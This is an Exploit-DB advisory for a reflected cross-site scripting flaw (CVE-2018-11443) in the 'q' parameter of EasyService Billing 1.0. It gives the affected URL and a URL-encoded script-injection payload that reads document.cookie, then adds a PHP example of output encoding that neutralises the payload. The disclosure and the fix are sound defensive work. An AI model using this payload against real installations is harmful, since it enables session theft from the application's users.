EasyService Billing 1.0 – Cross-Site Scripting

  • Author: Divya Jain
    Date: 2018-05-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44764/
  • <!--
    # Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter
    # Date: 25-05-2018
    # Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 
    # Exploit Author: Divya Jain
    # Version: EasyService Billing 1.0 
    # CVE: CVE-2018-11443
    # Category: Webapps
    # Severity: Medium
    # Tested on: KaLi LinuX_x64
    # # # # #
    # 
    # Proof of Concept:
    #
    ///////////
     //XSS//
    ///////////
     
     Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=
     Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27
     Parameter: q
     Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27
     
     ###########################################################################
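
Output encoding for the reflected `q` parameter, added here as an example; it is not code from EasyService Billing or from the original report. It assumes `q` is echoed either into HTML text or into a quoted string inside a `<script>` block (the page does not show the application's source), and the function names are hypothetical; `JSON_THROW_ON_ERROR` needs PHP 7.3 or later.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers, not part of EasyService Billing.

// Encode for HTML body text or a quoted attribute value.
function encode_for_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Encode as a JavaScript string literal that is safe inside <script>.
// JSON_HEX_TAG turns < and > into \u003C / \u003E, so "</script>" can no
// longer end the block; the other flags cover ', " and &.
function encode_for_script(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR
    );
}

// Constructed input: the reported value of q after URL decoding.
$q = urldecode('%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27');

// Assumed vulnerable pattern: raw value placed inside a quoted JS string.
$unsafe = "<script>var q = '" . $q . "';</script>";

// Hardened rendering, one form per output context.
$safeScript = '<script>var q = ' . encode_for_script($q) . ';</script>';
$safeHtml   = '<p>Results for: ' . encode_for_html($q) . '</p>';

// Count <script> openers beyond the ones the template itself emits.
$report = [
    'unsafe' => substr_count($unsafe, '<script>') - 1,
    'script' => substr_count($safeScript, '<script>') - 1,
    'html'   => substr_count($safeHtml, '<script>'),
];

foreach ($report as $context => $injected) {
    printf("%-6s injected <script> tags: %d\n", $context, $injected);
}

echo $unsafe, "\n", $safeScript, "\n", $safeHtml, "\n";
```

Only the raw concatenation yields an extra `<script>` element; both encoded forms carry the same input as inert data.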